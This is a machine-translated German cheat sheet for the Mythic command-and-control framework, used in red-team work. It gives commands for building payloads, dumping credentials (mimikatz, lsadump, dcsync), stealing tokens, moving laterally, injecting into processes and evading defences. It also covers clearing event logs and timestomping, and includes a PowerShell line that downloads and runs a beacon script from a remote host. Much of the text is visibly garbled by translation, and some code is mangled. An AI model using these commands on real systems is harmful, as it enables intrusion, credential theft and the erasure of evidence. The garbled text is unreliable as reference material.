Mythic C2 Framework Cheat Sheet¶
Überblick¶
Mythic ist ein moderner, plattformübergreifender Befehls- und Steuerungsrahmen (C2), der für rote Teamoperationen und adversäre Emulation konzipiert ist. Mythic bietet eine kollaborative Web-Schnittstelle, unterstützt mehrere Payload-Typen und bietet umfangreiche Anpassung durch seine agentenbasierte Architektur mit Unterstützung für mehrere Programmiersprachen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install Docker and Docker Compose¶
curl -fsSL https://get.docker.com -o get-docker.sh sudo sh get-docker.sh sudo usermod -aG docker $USER
Install Docker Compose¶
sudo curl -L "https://github.com/docker/compose/releases/download/v2.20.0/docker-compose-\((uname -s)-\)(uname -m)" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose
Verify installation¶
docker --version docker-compose --version ```_
Mythische Installation¶
```bash
Clone Mythic repository¶
git clone https://github.com/its-a-feature/Mythic.git cd Mythic
Make install script executable¶
chmod +x mythic-cli
Install Mythic¶
sudo ./mythic-cli install
Start Mythic services¶
sudo ./mythic-cli start
Check status¶
sudo ./mythic-cli status ```_
Quick Setup¶
```bash
One-liner installation¶
curl -sSL https://raw.githubusercontent.com/its-a-feature/Mythic/master/install.sh|bash
Access web interface¶
Navigate to https://localhost:7443¶
Default credentials will be displayed during installation¶
```_
Manuelle Docker Setup¶
```bash
Clone repository¶
git clone https://github.com/its-a-feature/Mythic.git cd Mythic
Build containers¶
docker-compose build
Start services¶
docker-compose up -d
View logs¶
docker-compose logs -f mythic_server ```_
Grundkonfiguration¶
Erster Setup¶
```bash
First-time configuration¶
- Navigate to https://localhost:7443
- Login with generated credentials
- Complete initial setup wizard
- Configure global settings
Change default passwords¶
sudo ./mythic-cli config set MYTHIC_ADMIN_PASSWORD newpassword sudo ./mythic-cli config set MYTHIC_SERVER_BIND_LOCALHOST_ONLY false
Restart services¶
sudo ./mythic-cli restart ```_
SSL Konfiguration¶
```bash
Generate SSL certificates¶
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /path/to/cert.pem sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /path/to/key.pem
Use Let's Encrypt¶
certbot certonly --standalone -d your-domain.com sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /etc/letsencrypt/live/your-domain.com/fullchain.pem sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /etc/letsencrypt/live/your-domain.com/privkey.pem
Restart with new certificates¶
sudo ./mythic-cli restart ```_
Installation von Agenten¶
```bash
Install popular agents¶
sudo ./mythic-cli install github https://github.com/MythicAgents/apfell.git sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon.git sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git sudo ./mythic-cli install github https://github.com/MythicAgents/merlin.git
List available agents¶
sudo ./mythic-cli list
Start specific agent¶
sudo ./mythic-cli start apfell ```_
Web Interface Navigation¶
Dashboard Übersicht¶
| Section | Description |
|---|---|
| Operations | Manage operations and campaigns |
| Payloads | Create and manage payload configurations |
| Callbacks | Active agent connections |
| Tasks | Command execution and task management |
| Files | File management and downloads |
| Credentials | Harvested credentials database |
| Artifacts | IOCs and forensic artifacts |
| Reporting | Generate operation reports |
Betriebsleitung¶
```bash
Create new operation¶
- Navigate to Operations → Create
- Configure operation parameters:
- Name: Red Team Exercise 2024
- Description: Authorized penetration test
- Admin: [Your username]
- Complete: false
Operation settings¶
- Webhook URL: [Slack/Teams integration]
- OPSEC: Enable/disable certain commands
- Logging: Configure audit logging ```_
Erstellung von Nutzlasten¶
Apfell (macOS/Linux) Payload¶
```bash
Create Apfell payload¶
- Navigate to Payloads → Create
- Select Apfell agent
- Configure parameters:
- Payload Type: apfell
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 80
- Callback Interval: 10
- Jitter: 23
Build options¶
- Output Format: bash, zsh, osascript, dylib
- Architecture: x64, arm64
- Obfuscation: Enable string obfuscation ```_
Poseidon (Cross-platform) Payload¶
```bash
Create Poseidon payload¶
- Navigate to Payloads → Create
- Select Poseidon agent
- Configure parameters:
- Payload Type: poseidon
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 443
- User Agent: Mozilla/5.0...
- Sleep: 5
- Jitter: 10
Advanced options¶
- Proxy: Configure proxy settings
- Headers: Custom HTTP headers
- Encryption: AES encryption key ```_
Apollo (Windows) Payload¶
```bash
Create Apollo payload¶
- Navigate to Payloads → Create
- Select Apollo agent
- Configure parameters:
- Payload Type: apollo
- C2 Profile: HTTP
- Architecture: x64, x86
- Format: exe, dll, shellcode
- Callback Host: [Your IP/Domain]
- Callback Port: 8080
Windows-specific options¶
- PPID Spoofing: Enable parent process spoofing
- Block DLLs: Block non-Microsoft DLLs
- ETW Bypass: Enable ETW evasion ```_
C2 Profile¶
HTTP Profilkonfiguration¶
json
\\\\{
"name": "HTTP Profile",
"description": "Standard HTTP communication",
"parameters": \\\\{
"callback_host": "192.168.1.100",
"callback_port": 80,
"killdate": "2024-12-31",
"encrypted_exchange_check": true,
"callback_jitter": 23,
"callback_interval": 10,
"get_uri": "/api/v1/status",
"post_uri": "/api/v1/data",
"query_path_name": "q",
"proxy_host": "",
"proxy_port": "",
"proxy_user": "",
"proxy_pass": ""
\\\\}
\\\\}_
HTTPS Profilkonfiguration¶
json
\\\\{
"name": "HTTPS Profile",
"description": "Encrypted HTTPS communication",
"parameters": \\\\{
"callback_host": "secure.example.com",
"callback_port": 443,
"callback_interval": 30,
"callback_jitter": 15,
"encrypted_exchange_check": true,
"ssl_cert_path": "/path/to/cert.pem",
"ssl_key_path": "/path/to/key.pem",
"headers": [
\\\\{
"name": "User-Agent",
"value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
\\\\}
]
\\\\}
\\\\}_
WebSocket Profil¶
json
\\\\{
"name": "WebSocket Profile",
"description": "WebSocket-based communication",
"parameters": \\\\{
"callback_host": "ws.example.com",
"callback_port": 8080,
"endpoint": "/ws",
"user_agent": "Mozilla/5.0...",
"heartbeat_interval": 30
\\\\}
\\\\}_
Personalmanagement¶
Rückruf-Interaktion¶
```bash
Basic callback commands¶
help # Show available commands whoami # Get current user pwd # Current directory ls # List directory contents cd [path] # Change directory cat [file] # Read file download [file] # Download file upload [local] [remote] # Upload file shell [command] # Execute shell command ```_
Prozessmanagement¶
```bash
Process operations¶
ps # List processes kill [pid] # Kill process jobs # List background jobs jobkill [jid] # Kill background job
Process injection (Apollo)¶
inject [pid] [shellcode] # Inject shellcode shinject [pid] [file] # Inject shellcode from file dllload [dll] # Load DLL ```_
Einrichtende Operationen¶
```bash
Credential harvesting¶
mimikatz [command] # Execute Mimikatz logonpasswords # Dump logon passwords lsadump # Dump LSA secrets dcsync [user] # DCSync attack
Token manipulation¶
steal_token [pid] # Steal process token make_token [user] [pass] # Create token rev2self # Revert to self ```_
Spätere Bewegung¶
```bash
Remote execution¶
psexec [target] [command] # PSExec execution wmiexec [target] [command] # WMI execution smbexec [target] [command] # SMB execution
PowerShell remoting¶
invoke_command [target] [command] # PowerShell remoting enter_pssession [target] # Interactive PS session
SSH (Poseidon)¶
ssh [target] [user] [key] # SSH connection scp [source] [dest] # Secure copy ```_
Erweiterte Funktionen¶
SOCKEN Proxy¶
```bash
Start SOCKS proxy¶
socks [port] # Start SOCKS⅘ proxy socks_list # List active proxies socks_kill [id] # Kill SOCKS proxy
Use with external tools¶
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24 ```_
Port Forwarding¶
```bash
Local port forwarding¶
portfwd [local_port] [remote_host] [remote_port]
Reverse port forwarding¶
rportfwd [remote_port] [local_host] [local_port]
List active forwards¶
portfwd_list
Kill port forward¶
portfwd_kill [id] ```_
Dateioperationen¶
```bash
File management¶
mkdir [directory] # Create directory rm [file] # Remove file mv [source] [dest] # Move file cp [source] [dest] # Copy file chmod [mode] [file] # Change permissions
Archive operations¶
zip [archive] [files] # Create zip archive unzip [archive] # Extract archive tar [options] [archive] # Tar operations ```_
Network Discovery¶
```bash
Network reconnaissance¶
portscan [target] [ports] # Port scanning ping [target] # ICMP ping traceroute [target] # Trace route arp # ARP table netstat # Network connections ifconfig # Network interfaces ```_
Automatisierung und Schrift¶
Aufgabenstellung¶
```python
Python automation script¶
import asyncio import mythic
async def automated_recon(callback_id): """Automated reconnaissance on new callback"""
# Basic system information
tasks = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an"
]
for task in tasks:
await mythic.issue_task(callback_id, task)
await asyncio.sleep(2)
# Credential harvesting if elevated
if await mythic.is_elevated(callback_id):
await mythic.issue_task(callback_id, "mimikatz logonpasswords")
await mythic.issue_task(callback_id, "lsadump")
Register automation¶
mythic.register_callback_automation(automated_recon) ```_
Webhook Integration¶
```python
Slack webhook integration¶
import requests import json
def send_slack_notification(callback_info): """Send Slack notification for new callbacks"""
webhook_url = "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
message = \\\\{
"text": f"New Mythic Callback",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{"title": "Host", "value": callback_info['host'], "short": True\\\\},
\\\\{"title": "User", "value": callback_info['user'], "short": True\\\\},
\\\\{"title": "Agent", "value": callback_info['agent'], "short": True\\\\},
\\\\{"title": "IP", "value": callback_info['ip'], "short": True\\\\}
]
\\\\}
]
\\\\}
requests.post(webhook_url, data=json.dumps(message),
headers=\\\\{'Content-Type': 'application/json'\\\\})
Configure webhook in Mythic¶
mythic.set_webhook_callback(send_slack_notification) ```_
Batch Operationen¶
```bash
!/bin/bash¶
Batch callback management script¶
MYTHIC_URL="https://localhost:7443" API_TOKEN="your_api_token"
Function to execute command on all callbacks¶
execute_on_all() \\{ local command=$1
# Get all active callbacks
callbacks=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" \
"$MYTHIC_URL/api/v1.4/callbacks"|jq -r '.callbacks[].id')
for callback_id in $callbacks; do
echo "[+] Executing '$command' on callback $callback_id"
curl -s -k -X POST \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"command\": \"$command\"\\\\}" \
"$MYTHIC_URL/api/v1.4/callbacks/$callback_id/tasks"
sleep 1
done
\\}
Usage examples¶
execute_on_all "whoami" execute_on_all "ps" execute_on_all "netstat -an" ```_
Benutzerdefinierte Agenten¶
Struktur der Entwicklung¶
```python
Custom agent template¶
from mythic_payloadtype_container.MythicCommandBase import * from mythic_payloadtype_container.MythicRPC import *
class CustomAgent(PayloadType): name = "custom_agent" file_extension = "py" author = "@your_handle" supported_os = [SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS] wrapper = False wrapped_payloads = [] note = "Custom Python-based agent" supports_dynamic_loading = True
async def build(self) -> BuildResponse:
# Build logic here
resp = BuildResponse(status=BuildStatus.Success)
return resp
Command implementation¶
class WhoAmI(CommandBase): cmd = "whoami" needs_admin = False help_cmd = "Get current user information" description = "Execute whoami command" version = 1 author = "@your_handle"
async def create_tasking(self, task: MythicTask) -> MythicTask:
task.display_params = "whoami"
return task
async def process_response(self, response: AgentResponse):
pass
```_
Agent Communication¶
```go // Go agent communication example package main
import ( "bytes" "crypto/tls" "encoding/json" "net/http" "time" )
type Agent struct \\{ ID string Host string Port int Interval time.Duration Jitter int \\}
func (a *Agent) Checkin() error \\{ checkinData := map[string]interface\\{\\}\\{ "action": "checkin", "uuid": a.ID, "ips": getLocalIPs(), "os": getOSInfo(), "user": getCurrentUser(), "host": getHostname(), "pid": getPID(), "ppid": getPPID(), \\}
jsonData, _ := json.Marshal(checkinData)
tr := &http.Transport\\\\{
TLSClientConfig: &tls.Config\\\\{InsecureSkipVerify: true\\\\},
\\\\}
client := &http.Client\\\\{Transport: tr\\\\}
resp, err := client.Post(
fmt.Sprintf("https://%s:%d/api/v1.4/agent_message", a.Host, a.Port),
"application/json",
bytes.NewBuffer(jsonData),
)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\}
func (a *Agent) GetTasks() ([]Task, error) \\{ // Implementation for getting tasks return nil, nil \\}
func (a *Agent) SendResponse(taskID string, response string) error \\{ // Implementation for sending task responses return nil \\} ```_
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Use Mythic with Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Mythic callback¶
upload meterpreter.exe /tmp/meterpreter.exe
Execute Metasploit payload¶
shell /tmp/meterpreter.exe
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
BlutHound Integration¶
```bash
Collect BloodHound data via Mythic¶
Upload SharpHound¶
upload SharpHound.exe /tmp/sharphound.exe
Run collection¶
shell /tmp/sharphound.exe -c All -d domain.local --zipfilename bloodhound.zip
Download results¶
download /tmp/bloodhound.zip
Import into BloodHound¶
neo4j start ./BloodHound --no-sandbox ```_
Cobalt Strike Integration¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use Mythic for initial access, pivot to Beacon¶
From Mythic callback¶
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```_
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Domain fronting configuration¶
Configure CDN (CloudFlare, AWS CloudFront)¶
Set up domain fronting rules¶
Update C2 profile with fronted domain¶
Certificate management¶
Use legitimate SSL certificates¶
Implement certificate pinning¶
Rotate certificates regularly¶
```_
Verkehrsanalyse Evanation¶
```bash
Malleable profiles¶
Mimic legitimate applications¶
Use common user agents¶
Implement realistic timing¶
Example profile mimicking Office 365¶
\\{ "name": "Office365", "user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)", "get_uri": "/owa/auth/logon.aspx", "post_uri": "/owa/auth/owaauth.dll", "headers": [ \\{"name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8"\\}, \\{"name": "Accept-Language", "value": "en-US,en;q=0.5"\\}, \\{"name": "Accept-Encoding", "value": "gzip, deflate"\\} ] \\} ```_
Anti-Forensik¶
```bash
Event log clearing¶
shell wevtutil cl System shell wevtutil cl Security shell wevtutil cl Application
Timestomping¶
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Memory cleanup¶
Implement secure memory wiping¶
Use process migration¶
Clear command history¶
```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Callback not connecting¶
- Check firewall rules
- Verify C2 profile configuration
- Test network connectivity
- Check DNS resolution
SSL/TLS issues¶
Regenerate certificates¶
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /new/path/cert.pem sudo ./mythic-cli restart
Container issues¶
Check Docker status¶
docker ps -a docker logs mythic_server
Restart services¶
sudo ./mythic-cli restart ```_
Debug Mode¶
```bash
Enable debug logging¶
sudo ./mythic-cli config set MYTHIC_DEBUG_LEVEL DEBUG sudo ./mythic-cli restart
View logs¶
sudo ./mythic-cli logs
Database issues¶
Access PostgreSQL¶
docker exec -it mythic_postgres psql -U mythic_user -d mythic_db
Reset database¶
sudo ./mythic-cli database reset ```_
Leistungsoptimierung¶
```bash
Optimize Docker resources¶
Increase memory allocation¶
sudo ./mythic-cli config set MYTHIC_DOCKER_MEMORY 4g
Optimize callback intervals¶
Increase sleep time for stealth¶
Reduce jitter for faster response¶
Database optimization¶
Regular database maintenance¶
Index optimization¶
Query performance tuning¶
```_
Best Practices¶
Betriebsplanung¶
- ** Voreinstellung*: Profile und Agenten vor dem Eingriff konfigurieren
- Teamkoordination: Einsatzbetriebsmanagement für Teamkooperation
- ** Kommunikationsprotokolle*: klare C2-Kommunikationskanäle einrichten
- Datenhandling: Implementierung sicherer Datenerfassung und Exfiltration
- **Cleanup-Verfahren*: Plan zur Artefaktentfernung und Betriebsreinigung
Sicherheitsüberlegungen¶
```bash
Secure deployment¶
Use strong authentication¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Agent management¶
Use unique agent configurations¶
Implement kill dates¶
Regular agent rotation¶
Secure communication channels¶
```_
Dokumentation und Reporting¶
```bash
Operation documentation¶
Maintain detailed logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```_
Ressourcen¶
- Mythic GitHub Repository
- Mythische Dokumentation
- Mythic Agents Repository
- Mythic C2 Profiles
- [Red Team Village Mythic Training](LINK_5_
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Mythic C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *